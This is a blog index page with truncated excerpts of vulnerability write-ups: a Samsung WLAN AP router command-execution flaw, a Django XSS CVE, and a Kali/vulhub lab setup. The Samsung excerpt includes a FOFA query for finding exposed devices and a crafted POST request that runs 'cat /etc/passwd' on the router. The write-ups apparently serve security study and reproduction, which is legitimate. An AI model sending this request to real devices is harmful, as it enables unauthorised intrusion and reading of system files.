![](https://img-blog.csdnimg.cn/20201014180756918.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞分析
GuiltyFet
Technology Writing Attitude
展开
-
三星 WLAN AP WEA453e路由器 远程命令执行漏洞
漏洞简介路由器是连接两个或多个网络的硬件设备,在网络间起网关的作用,是读取每一个数据包中的地址然后决定如何传送的专用智能性的网络设备。漏洞复现fofatitle==“Samsung WLAN AP”对首页抓包构造如下请求包POST /(download)/tmp/a.txt HTTP/1.1Host: x.x.x.x.Connection: closeContent-Length: 48command1=shell:cat /etc/passwd| dd of=/tmp/a.t原创 2021-11-02 10:42:36 · 663 阅读 · 0 评论 -
django CVE-2017-12794 xss
漏洞描述Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。影响版本:1.11.5之前的版本。漏洞环境kali+docker(root????guiltyfet)-[/home/guiltyfet/原创 2021-11-01 09:59:09 · 145 阅读 · 0 评论 -
2021kali+vulhub
kali+vulhub搭建种子链接下载地址https://cdimage.kali.org/kali-2021.3/kali-linux-2021.3a-installer-amd64.iso(root????kali)-[/home/guiltyfet]└─# apt-get update获取:1 http://mirrors.neusoft.edu.cn/kali kali-rolling InRelease [30.6 kB]获取:2 http://mirrors.neusoft.edu.原创 2021-10-28 23:40:27 · 416 阅读 · 0 评论